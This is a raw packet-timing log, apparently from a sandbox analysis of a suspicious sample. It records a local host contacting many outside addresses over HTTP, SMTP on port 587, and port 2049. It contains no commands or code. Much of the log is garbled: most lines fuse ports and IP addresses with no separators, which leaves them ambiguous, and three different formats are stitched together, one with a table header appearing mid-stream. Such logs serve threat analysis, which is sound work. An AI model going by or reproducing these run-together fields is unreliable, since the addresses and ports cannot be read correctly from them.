                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.123855114 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.129142046 CET80598033.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.129209995 CET5980380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.137866974 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143368006 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143457890 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143604994 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143634081 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.148572922 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.148617029 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545171976 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545810938 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545824051 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545918941 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546071053 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546119928 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546144009 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546437025 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546452999 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546485901 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546506882 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546538115 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546544075 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.547050953 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.562927961 CET5980480192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.563486099 CET5980580192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.568202972 CET805980435.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.568325996 CET805980535.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.598711967 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.603648901 CET805980618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.603749037 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.609092951 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.609321117 CET5980680192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.613969088 CET805980618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.614196062 CET805980618.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.687047005 CET598072049192.168.2.5212.162.149.53
Nov 5, 2024 17:04:32.692054987 CET    2049    59807    212.162.149.53    192.168.2.5
Nov 5, 2024 17:04:32.693885088 CET    59807   2049     192.168.2.5       212.162.149.53
Nov 5, 2024 17:04:32.694123983 CET    59807   2049     192.168.2.5       212.162.149.53
Nov 5, 2024 17:04:32.698992014 CET    2049    59807    212.162.149.53    192.168.2.5
Nov 5, 2024 17:04:32.993133068 CET    59808   80       192.168.2.5       18.141.10.107
Nov 5, 2024 17:04:32.998239040 CET    80      59808    18.141.10.107     192.168.2.5
Nov 5, 2024 17:04:32.998347998 CET    59808   80       192.168.2.5       18.141.10.107
Nov 5, 2024 17:04:32.998570919 CET    59808   80       192.168.2.5       18.141.10.107
Nov 5, 2024 17:04:32.998759985 CET    59808   80       192.168.2.5       18.141.10.107
Nov 5, 2024 17:04:33.004230022 CET    80      59808    18.141.10.107     192.168.2.5
Nov 5, 2024 17:04:33.004419088 CET    80      59808    18.141.10.107     192.168.2.5
Nov 5, 2024 17:04:33.185785055 CET    2049    59807    212.162.149.53    192.168.2.5
Nov 5, 2024 17:04:33.187069893 CET    59807   2049     192.168.2.5       212.162.149.53
Nov 5, 2024 17:04:33.187472105 CET    59807   2049     192.168.2.5       212.162.149.53
Nov 5, 2024 17:04:34.041248083 CET    80      59806    18.141.10.107     192.168.2.5
Nov 5, 2024 17:04:34.041455984 CET    59806   80       192.168.2.5       18.141.10.107
Nov 5, 2024 17:04:34.046962023 CET    80      59806    18.141.10.107     192.168.2.5
Nov 5, 2024 17:04:34.047038078 CET    59806   80       192.168.2.5       18.141.10.107
Nov 5, 2024 17:04:34.121526003 CET    59719   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.123651981 CET    59809   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.126895905 CET    80      59719    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:34.127048969 CET    59719   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.128611088 CET    80      59809    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:34.128690004 CET    59809   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.133176088 CET    59809   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.133244038 CET    59809   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.138158083 CET    80      59809    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:34.138300896 CET    80      59809    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:34.432279110 CET    80      59808    18.141.10.107     192.168.2.5
Nov 5, 2024 17:04:34.433727980 CET    59808   80       192.168.2.5       18.141.10.107
Nov 5, 2024 17:04:34.440362930 CET    80      59808    18.141.10.107     192.168.2.5
Nov 5, 2024 17:04:34.441081047 CET    59808   80       192.168.2.5       18.141.10.107
Nov 5, 2024 17:04:34.520817041 CET    59400   587      192.168.2.5       51.195.88.199
Nov 5, 2024 17:04:34.525605917 CET    587     59400    51.195.88.199     192.168.2.5
Nov 5, 2024 17:04:34.764106989 CET    587     59400    51.195.88.199     192.168.2.5
Nov 5, 2024 17:04:34.764676094 CET    59400   587      192.168.2.5       51.195.88.199
Nov 5, 2024 17:04:34.775217056 CET    80      59809    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:34.830449104 CET    59809   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.830892086 CET    59810   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.835659027 CET    80      59809    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:34.835711002 CET    59809   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.835783958 CET    80      59810    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:34.836690903 CET    59810   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.836910963 CET    59810   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.836940050 CET    59810   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:34.841939926 CET    80      59810    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:34.842523098 CET    80      59810    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.047936916 CET    59625   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.048495054 CET    59811   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.053855896 CET    80      59811    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.053946018 CET    59811   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.054140091 CET    59811   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.054156065 CET    59811   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.057012081 CET    80      59625    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.057204008 CET    59625   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.059705973 CET    80      59811    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.059717894 CET    80      59811    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.477526903 CET    80      59810    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.519967079 CET    59812   80       192.168.2.5       44.221.84.105
Nov 5, 2024 17:04:35.524815083 CET    80      59812    44.221.84.105     192.168.2.5
Nov 5, 2024 17:04:35.524884939 CET    59812   80       192.168.2.5       44.221.84.105
Nov 5, 2024 17:04:35.525202990 CET    59812   80       192.168.2.5       44.221.84.105
Nov 5, 2024 17:04:35.525202990 CET    59812   80       192.168.2.5       44.221.84.105
Nov 5, 2024 17:04:35.530056000 CET    80      59812    44.221.84.105     192.168.2.5
Nov 5, 2024 17:04:35.530117035 CET    80      59812    44.221.84.105     192.168.2.5
Nov 5, 2024 17:04:35.684456110 CET    59810   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.695395947 CET    80      59811    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.733706951 CET    59811   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.733804941 CET    59811   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:35.738697052 CET    80      59811    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.738719940 CET    80      59811    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.878901005 CET    80      59811    208.100.26.245    192.168.2.5
Nov 5, 2024 17:04:35.947756052 CET    59811   80       192.168.2.5       208.100.26.245
Nov 5, 2024 17:04:36.188997030 CET    80      59812    44.221.84.105     192.168.2.5
Nov 5, 2024 17:04:36.189975023 CET    59812   80       192.168.2.5       44.221.84.105
Nov 5, 2024 17:04:36.195647955 CET    80      59812    44.221.84.105     192.168.2.5
Nov 5, 2024 17:04:36.195796967 CET    59812   80       192.168.2.5       44.221.84.105
Nov 5, 2024 17:04:36.211287975 CET    59813   80       192.168.2.5       34.211.97.45
Nov 5, 2024 17:04:36.216311932 CET    80      59813    34.211.97.45      192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.216377974 CET5981380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.219011068 CET5981380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.219075918 CET5981380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.223992109 CET805981334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.224111080 CET805981334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.286950111 CET5981480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.291984081 CET805981444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.292107105 CET5981480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.292485952 CET5981480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.292485952 CET5981480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.298218012 CET805981444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.298254013 CET805981444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.946475983 CET805981444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.963263035 CET5981480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.968873024 CET805981444.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.970315933 CET5981480192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.040661097 CET805981334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.159766912 CET805981334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.160955906 CET5981380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.308521986 CET5981380192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.313363075 CET805981334.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.395663977 CET5981580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.400593042 CET805981518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.400664091 CET5981580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.401132107 CET5981580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.401181936 CET5981580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.405916929 CET805981518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.405981064 CET805981518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.695647955 CET5981680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.700566053 CET805981634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.700705051 CET5981680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.718473911 CET5981680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.718527079 CET5981680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.723421097 CET805981634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.723484039 CET805981634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.062328100 CET805981518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.062711000 CET5981580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.068027973 CET805981518.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.068186998 CET5981580192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.100027084 CET5981780192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.104881048 CET80598173.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.105026007 CET5981780192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.105509996 CET5981780192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.105577946 CET5981780192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.110294104 CET80598173.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.110316992 CET80598173.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.175029993 CET59818587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.180859089 CET5875981851.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.184535027 CET59818587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.202074051 CET598192049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.207020044 CET204959819212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.207201958 CET598192049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.207468987 CET598192049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.212601900 CET204959819212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.540276051 CET805981634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.540693998 CET5981680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.546511889 CET805981634.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.548068047 CET5981680192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.688620090 CET204959819212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.989425898 CET805982254.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.992831945 CET5982280192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.999267101 CET805982254.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.999322891 CET5982280192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.015767097 CET5982480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.021812916 CET805982418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.021919966 CET5982480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.022072077 CET5982480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.022097111 CET5982480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.026998043 CET805982418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.027017117 CET805982418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.073456049 CET5875981851.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.077151060 CET59818587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.082026958 CET5875981851.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.322685003 CET5875981851.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.322953939 CET59818587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.327855110 CET5875981851.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.376957893 CET80598233.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.377202034 CET5982380192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.382383108 CET80598233.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.382443905 CET5982380192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.513842106 CET59818587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.578594923 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.663573027 CET5875981851.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.665210009 CET59818587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.665343046 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.665661097 CET5875981851.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.665743113 CET59818587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.669028997 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.776981115 CET5982680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.782943010 CET805982654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.783019066 CET5982680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.785294056 CET5982680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.785413980 CET5982680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.791258097 CET805982654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.791269064 CET805982654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.863279104 CET805982418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.867207050 CET5982480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.873512983 CET805982418.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.873568058 CET5982480192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.028403997 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.028455973 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.033612013 CET8059811208.100.26.245192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.034100056 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.034176111 CET5981180192.168.2.5208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.034198046 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.460877895 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.461091995 CET59825587192.168.2.551.195.88.199
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.466690063 CET5875982551.195.88.199192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.516983986 CET6199380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.522089005 CET806199318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.522171021 CET6199380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.522381067 CET6199380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.522428989 CET6199380192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.527242899 CET806199318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.527255058 CET806199318.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.626332045 CET805982654.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.626632929 CET5982680192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.631866932 CET805982654.244.188.177192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 5, 2024 17:04:42.634628057 CET | 59826 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:04:42.699610949 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:42.699764013 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:42.704782963 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:42.938277006 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:42.939002991 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:42.944083929 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.084091902 CET | 61994 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:04:43.089075089 CET | 80 | 61994 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:04:43.089153051 CET | 61994 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:04:43.089688063 CET | 61994 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:04:43.089869022 CET | 61994 | 80 | 192.168.2.5 | 54.244.188.177
Nov 5, 2024 17:04:43.094506979 CET | 80 | 61994 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:04:43.094908953 CET | 80 | 61994 | 54.244.188.177 | 192.168.2.5
Nov 5, 2024 17:04:43.182912111 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.183068991 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.183083057 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.183132887 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:43.183439970 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.183725119 CET | 80 | 61993 | 18.208.156.248 | 192.168.2.5
Nov 5, 2024 17:04:43.183784962 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:43.197587013 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199
Nov 5, 2024 17:04:43.202444077 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5
Nov 5, 2024 17:04:43.218664885 CET | 80 | 61993 | 18.208.156.248 | 192.168.2.5
Nov 5, 2024 17:04:43.218719006 CET | 61993 | 80 | 192.168.2.5 | 18.208.156.248
Nov 5, 2024 17:04:43.219224930 CET | 61993 | 80 | 192.168.2.5 | 18.208.156.248
Nov 5, 2024 17:04:43.224016905 CET | 80 | 61993 | 18.208.156.248 | 192.168.2.5
Nov 5, 2024 17:04:43.244913101 CET | 61995 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:04:43.251270056 CET | 80 | 61995 | 44.221.84.105 | 192.168.2.5
Nov 5, 2024 17:04:43.251338005 CET | 61995 | 80 | 192.168.2.5 | 44.221.84.105
Nov 5, 2024 17:04:43.251580000 CET | 61995 | 80 | 192.168.2.5 | 44.221.84.105
